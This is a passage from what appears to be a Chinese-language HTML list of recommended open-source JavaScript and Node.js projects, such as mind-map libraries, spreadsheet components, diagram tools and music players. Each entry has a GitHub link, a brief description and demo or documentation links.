            &lt;a href=&quot;https://github.com/ssshooter/mind-elixir-core&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mind-elixir-core&lt;/a&gt; - 一个无框架依赖的思维导图内核。&lt;a href=&quot;https://mind-elixir.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hizzgdev/jsmind&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jsmind&lt;/a&gt; - 一个显示/编辑思维导图的纯 &lt;code&gt;JavaScript&lt;/code&gt; 类库。&lt;a href=&quot;https://jsmind.online/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/naptha/tesseract.js&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tesseract.js&lt;/a&gt; - 一个 &lt;code&gt;JavaScript&lt;/code&gt; 库，可以从图片中获得几乎任何语言的文字。 &lt;a href=&quot;https://tesseract.projectnaptha.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tholman/cursor-effects&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cursor-effects&lt;/a&gt; - 用现代的 &lt;code&gt;JavaScript&lt;/code&gt; 为你的浏览器建立老式的光标效果。&lt;a href=&quot;https://tholman.com/cursor-effects/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/drichard/mindmaps&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mindmaps&lt;/a&gt; - 一个利用 &lt;code&gt;HTML5&lt;/code&gt; 技术的开源、离线、思维导图应用程序。&lt;a href=&quot;https://www.mindmaps.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sivan/heti&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;heti&lt;/a&gt; - 专为中文内容展示设计的排版样式增强。基于通行的中文排版规范而来，可以为网站的读者带来更好的文章阅读体验。&lt;a href=&quot;https://sivan.github.io/heti/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lovasoa/whitebophir&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;whitebophir&lt;/a&gt; - 简单、免费、易于使用和部署的在线协作白板。&lt;a href=&quot;https://wbo.ophir.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mumuy/relationship&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;relationship&lt;/a&gt; - 中国亲戚关系计算器 - 家庭称谓/亲戚称呼/称呼计算/辈分计算/亲戚关系算法/親戚稱呼計算機。&lt;a href=&quot;https://passer-by.com/relationship/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lucide-icons/lucide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lucide&lt;/a&gt; - 精美一致的图标工具包。&lt;a href=&quot;https://lucide.dev/icons/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/typicode/json-server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;json-server&lt;/a&gt; - 在 30 秒内创建一个 &lt;code&gt;REST API&lt;/code&gt; 服务。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/biaogebusy/xinshi-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xinshi-ui&lt;/a&gt; - 丰富的组件库，完整的前端解决方案，通过 &lt;code&gt;Web Builder&lt;/code&gt; 拖拽快速构建响应式、多主题的网站。&lt;a href=&quot;https://www.zhaobg.com/builder&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lxfater/inpaint-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;inpaint-web&lt;/a&gt; - 基于 &lt;code&gt;Webgpu&lt;/code&gt; 技术和 &lt;code&gt;wasm&lt;/code&gt; 技术的免费开源 &lt;code&gt;inpainting&lt;/code&gt; 工具。&lt;a href=&quot;https://inpaintweb.lxfater.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhlint-project/zhlint&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;zhlint&lt;/a&gt; - 中文文本内容的 &lt;code&gt;linting&lt;/code&gt; 工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Meituan-Dianping/Logan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Logan&lt;/a&gt; - 团点评集团推出的大前端日志系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/goldbergyoni/javascript-testing-best-practices&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;javascript-testing-best-practices&lt;/a&gt; - 全面和详尽的 &lt;code&gt;JavaScript&lt;/code&gt; 和 &lt;code&gt;Node.js&lt;/code&gt; 测试最佳实践。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/trekhleb/javascript-algorithms&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;javascript-algorithms&lt;/a&gt; - 用 &lt;code&gt;JavaScript&lt;/code&gt; 实现算法和数据结构。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tjy-gitnub/win12&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;win12&lt;/a&gt; - Windows 12 网页版。&lt;a href=&quot;https://tjy-gitnub.github.io/win12/desktop.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wangdoc/javascript-tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;javascript-tutorial&lt;/a&gt; - &lt;code&gt;JavaScript&lt;/code&gt; 教程。&lt;a href=&quot;https://wangdoc.com/javascript/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/buuing/lucky-canvas&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lucky-canvas&lt;/a&gt; - 基于 &lt;code&gt;TS &lt;/code&gt;+ &lt;code&gt;Canvas&lt;/code&gt; 开发的【大转盘 / 九宫格 / 老虎机】抽奖插件。&lt;a href=&quot;https://100px.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chokcoco/CSS-Inspiration&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CSS-Inspiration&lt;/a&gt; - 以分类的形式，展示不同 &lt;code&gt;CSS&lt;/code&gt; 属性或者不同的课题使用 &lt;code&gt;CSS&lt;/code&gt; 来解决的各种方法。&lt;a href=&quot;https://csscoco.com/inspiration/#/./init&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LHRUN/paint-board&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;paint-board&lt;/a&gt; - 一款支持多端操作的趣味艺术画板。&lt;a href=&quot;https://songlh.top/paint-board/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/carbon-app/carbon&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;carbon&lt;/a&gt; - 代码转图片工具。&lt;a href=&quot;https://carbon.now.sh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/handsontable/handsontable&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;handsontable&lt;/a&gt; - 在线电子表格组件。&lt;a href=&quot;https://handsontable.com/demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://handsontable.com/docs/javascript-data-grid/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/myliang/x-spreadsheet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;x-spreadsheet&lt;/a&gt; - 基于 &lt;code&gt;JavaScript&lt;/code&gt; 快速构建 &lt;code&gt;Web Excel&lt;/code&gt;.&lt;a href=&quot;https://hondrytravis.com/x-spreadsheet-doc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ruilisi/fortune-sheet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;fortune-sheet&lt;/a&gt; - 一款开箱即用的类似 &lt;code&gt;Excel&lt;/code&gt; 和 &lt;code&gt;Google Sheets&lt;/code&gt; 的 &lt;code&gt;JavaScript&lt;/code&gt; 表格组件。&lt;a href=&quot;https://ruilisi.github.io/fortune-sheet-demo/?path=/story/features--basic&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dream-num/univer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;univer&lt;/a&gt; - 一套企业文档与数据协同解决方案，融合了电子表格、文档和幻灯片。&lt;a href=&quot;https://univer.ai/playground&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/likaia/js-screen-shot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;js-screen-shot&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/likaia/js-screen-shot?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/likaia/js-screen-shot?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/likaia/js-screen-shot?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/likaia/js-screen-shot?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/likaia/js-screen-shot&quot; data-origin=&quot;https://img.shields.io/github/license/likaia/js-screen-shot&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/likaia/js-screen-shot&quot; data-origin=&quot;https://img.shields.io/github/last-commit/likaia/js-screen-shot&quot; alt=&quot;&quot;/&gt; - &lt;code&gt;web&lt;/code&gt; 端自定义截图插件。&lt;a href=&quot;https://www.kaisir.cn/js-screen-shot/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jgraph/drawio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;drawio&lt;/a&gt; - 一个用于通用图表的 &lt;code&gt;JavaScript&lt;/code&gt; 客户端编辑器。&lt;a href=&quot;https://app.diagrams.net/?src=about&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nhn/tui.calendar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tui.calendar&lt;/a&gt; - 功能齐全的 &lt;code&gt;JavaScript&lt;/code&gt; 日历管理框架。&lt;a href=&quot;https://ui.toast.com/tui-calendar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mermaid-js/mermaid&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mermaid&lt;/a&gt; - 一个基于 &lt;code&gt;Javascript&lt;/code&gt; 的图表绘制工具，通过解析类 &lt;code&gt;Markdown&lt;/code&gt; 的文本语法来实现图表的创建和动态修改。&lt;a href=&quot;https://mermaid.live/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://mermaid.js.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;nodejs-项目&quot;&gt;
    &lt;a href=&quot;?id=nodejs-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;nodejs-项目&quot;&gt;&lt;code&gt;Node.js&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jhuckaby/Cronicle&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Cronicle&lt;/a&gt; - 一个简单的分布式任务计划程序和运行器，具有基于 &lt;code&gt;Web&lt;/code&gt; 的 &lt;code&gt;UI&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cambecc/earth&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;earth&lt;/a&gt; - 一个可视化全球天气状况的项目。&lt;a href=&quot;https://earth.nullschool.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Ice-Hazymoon/MikuTools&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MikuTools&lt;/a&gt; - 一个轻量的工具集合。&lt;a href=&quot;https://tools.miku.ac/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hoppscotch/hoppscotch&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hoppscotch&lt;/a&gt; - 可以通过 &lt;code&gt;Web&lt;/code&gt; 服务的方式构建 &lt;code&gt;API&lt;/code&gt; 访问的工具，使用 &lt;code&gt;Node.js&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 开发，功能与 &lt;code&gt;Postman&lt;/code&gt; 类似。&lt;a href=&quot;https://hoppscotch.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/HabitRPG/habitica&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;habitica&lt;/a&gt; - 一个习惯跟踪器应用程序，它像角色扮演游戏一样对待您的目标。&lt;a href=&quot;https://habitica.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/webstudio-is/webstudio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;webstudio&lt;/a&gt; - 一个开源的可视化开发平台。&lt;a href=&quot;https://webstudio.is/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jaywcjlove/reference&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;reference&lt;/a&gt; - 为开发人员分享快速参考备忘清单(速查表)。&lt;a href=&quot;https://wangchujiang.com/reference/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MrXujiang/h5-Dooring&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;h5-Dooring&lt;/a&gt; - 一款功能强大，专业可靠的 &lt;code&gt;H5&lt;/code&gt; 可视化页面配置解决方案。&lt;a href=&quot;http://h5.dooring.cn/h5_plus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://h5.dooring.cn/doc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cnodejs/nodeclub&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nodeclub&lt;/a&gt; - 使用 &lt;code&gt;Node.js&lt;/code&gt; 和 &lt;code&gt;MongoDB&lt;/code&gt; 开发的社区系统。&lt;a href=&quot;https://cnodejs.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/verdaccio/verdaccio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;verdaccio&lt;/a&gt; - 轻量级的 &lt;code&gt;Node.js&lt;/code&gt; 私有 &lt;code&gt;registry&lt;/code&gt; 代理。&lt;a href=&quot;https://verdaccio.org/docs/what-is-verdaccio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/holynova/gushi_namer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gushi_namer&lt;/a&gt; - 古诗文起名: 利用诗经、楚辞唐诗、宋词等给小朋友起名字。&lt;a href=&quot;http://xiaosang.net/gushi_namer/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Binaryify/NeteaseCloudMusicApi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;NeteaseCloudMusicApi&lt;/a&gt; - 网易云音乐 &lt;code&gt;Node.js&lt;/code&gt; &lt;code&gt;API&lt;/code&gt; &lt;code&gt;Service&lt;/code&gt;。&lt;a href=&quot;https://neteasecloudmusicapi-docs.4everland.app/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jaywcjlove/github-rank&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github-rank&lt;/a&gt; - &lt;code&gt;Github&lt;/code&gt; 全球/中国用户排名，全球仓库 &lt;code&gt;Star&lt;/code&gt; 最多排名，通过 &lt;code&gt;Github API v3&lt;/code&gt; 来生成页面数据。&lt;a href=&quot;https://wangchujiang.com/github-rank/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/1111mp/nvm-desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nvm-desktop&lt;/a&gt; - 一个可视化界面操作管理多个 &lt;code&gt;Node&lt;/code&gt; 版本的桌面应用，支持 &lt;code&gt;Macos&lt;/code&gt; 和 &lt;code&gt;Windows&lt;/code&gt; 系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/calcom/cal.com&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cal.com&lt;/a&gt; - &amp;nbsp;基于 &lt;code&gt;Next.js&lt;/code&gt; + &lt;code&gt;React&lt;/code&gt; + &lt;code&gt;Tailwind CSS&lt;/code&gt; 构建的现代化、开源的日程管理平台。&lt;a href=&quot;https://app.cal.com/auth/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/staticfile/static&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;static&lt;/a&gt; - 开放静态文件，为开源库提供稳定、快速的免费 &lt;code&gt;CDN&lt;/code&gt; 服务。&lt;a href=&quot;https://www.staticfile.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/palxiao/poster-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;poster-design&lt;/a&gt; - 一款漂亮且功能强大的在线海报图片设计器，仿稿定设计。&lt;a href=&quot;https://design.palxp.cn/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sleepy-zone/fabritor-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;fabritor-web&lt;/a&gt; - 一款基于 &lt;code&gt;fabricjs&lt;/code&gt; 的创意图片编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/t4t5/sweetalert&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sweetalert&lt;/a&gt; - 一个美观的 &lt;code&gt;JavaScript&lt;/code&gt; 的 &lt;code&gt;alert&lt;/code&gt; 的替代品。&lt;a href=&quot;https://sweetalert.js.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cuixueshe/earthworm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;earthworm&lt;/a&gt; - 通过连词构句的方式让你更好的学习英语。&lt;a href=&quot;https://earthworm.cuixueshe.com/main/1&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/redis/ioredis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ioredis&lt;/a&gt; - 一个用于 &lt;code&gt;Node.js&lt;/code&gt; 的 &lt;code&gt;Redis&lt;/code&gt; 客户端，具有强大、性能优化和功能齐全的特点。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/HeyPuter/puter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;puter&lt;/a&gt; - 基于 &lt;code&gt;Web&lt;/code&gt; 的桌面操作系统，运行于浏览器中，具有丰富的功能、速度极快且可高度扩展。&lt;a href=&quot;https://puter.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qier222/YesPlayMusic&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;YesPlayMusic&lt;/a&gt; - 高颜值的第三方网易云播放器，支持 &lt;code&gt;Windows&lt;/code&gt; / &lt;code&gt;macOS&lt;/code&gt; / &lt;code&gt;Linux&lt;/code&gt;. &lt;a href=&quot;https://music.qier222.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Ovilia/lipstick&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lipstick&lt;/a&gt; - 口红颜色可视化。&lt;a href=&quot;http://zhangwenli.com/lipstick/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/CADmium-Co/CADmium&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CADmium&lt;/a&gt; - 在浏览器中运行的 &lt;code&gt;CAD&lt;/code&gt; 程序。&lt;a href=&quot;https://cadmium-co.github.io/CADmium/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chowa/ejyy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ejyy&lt;/a&gt; - 一整套基于 &lt;code&gt;AGPL&lt;/code&gt; 开源协议开源的&lt;strong&gt;智慧物业&lt;/strong&gt;解决方案。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tw93/Pake&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Pake&lt;/a&gt; - 利用 &lt;code&gt;Rust&lt;/code&gt; 轻松构建轻量级多端桌面应用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
